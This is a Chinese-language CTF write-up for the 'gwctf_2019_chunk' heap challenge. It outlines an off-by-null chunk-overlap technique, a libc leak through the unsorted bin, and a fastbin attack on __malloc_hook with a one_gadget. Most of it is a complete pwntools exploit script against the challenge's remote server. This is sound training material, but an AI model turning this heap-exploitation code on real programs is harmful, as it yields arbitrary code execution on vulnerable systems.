前置知识
off-by-null
制作三明治结构,即大-小-大的chunk
,然后通过off-by-null
小的,同时写第二个大的prev_size
,来使得三个chunk
合并为一个,再申请回第一个大的,此时小的会被写unsortedbin
,泄露出libc
,再申请回小的,就有重叠指针可以打fastbin attack
fastbin attack
,打错位0x7f
realloc_hook
调整栈帧打one_gadget
整体思路
总体来说就是利用off-by-null
来泄露libc
和重叠指针,比较白给。假如不了解off-by-null
利用的话,可以跟着exp
慢慢写一遍,这类模板题就都明白了。
exp
from pwn import *
from LibcSearcher import *
filename = './gwctf_2019_chunk'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')
if local:
sh = process(filename)
else:
sh = remote('node4.buuoj.cn', 28044)
def debug():
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
gdb.attach(pid)
pause()
choice_words = 'Your choice: '
menu_add = 1
add_index_words = 'Give me a book ID: '
add_size_words = 'how long: '
add_content_words = ''
menu_del = 3
del_index_words = 'Which one to throw?\n'
menu_show = 2
show_index_words = 'Which book do you want to show?'
menu_edit = 4
edit_index_words = 'Which book to write?'
edit_size_words = ''
edit_content_words = 'Content: '
def add(index=-1, size=-1, content=''):
sh.sendlineafter(choice_words, str(menu_add))
if add_index_words:
sh.sendlineafter(add_index_words, str(index))
if add_size_words:
sh.sendlineafter(add_size_words, str(size))
if add_content_words:
sh.sendafter(add_content_words, content)
def delete(index=-1):
sh.sendlineafter(choice_words, str(menu_del))
if del_index_words:
sh.sendlineafter(del_index_words, str(index))
def show(index=-1):
sh.sendlineafter(choice_words, str(menu_show))
if show_index_words:
sh.sendlineafter(show_index_words, str(index))
def edit(index=-1, size=-1, content=''):
sh.sendlineafter(choice_words, str(menu_edit))
if edit_index_words:
sh.sendlineafter(edit_index_words, str(index))
if edit_size_words:
sh.sendlineafter(edit_size_words, str(size))
if edit_content_words:
sh.sendafter(edit_content_words, content)
def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)
add(index=0, size=0xf0) # 0
add(index=1, size=0x68) # 1
add(index=2, size=0xf0) # 2
add(index=3, size=0x10) # 3
delete(index=0)
payload = b'a'*0x60 + p64(0x170)
edit(index=1, content=payload)
delete(index=2)
add(index=0, size=0xf0) # 0
show(index=1)
libc_leak = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
leak_info('libc_leak', libc_leak)
libc.address = libc_leak - 0x3c4b78
leak_info('libc.address', libc.address)
add(index=4, size=0x68) # 4
delete(index=1)
fake_malloc_chunk = libc.address + 0x3c4aed
edit(index=4, content=p64(fake_malloc_chunk) + b'\n')
add(index=5, size=0x68) # 5
add(index=6, size=0x68) #6
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 13)
edit(index=6, content=payload + b'\n')
add(index=7, size=0x40)
sh.interactive()
# debug()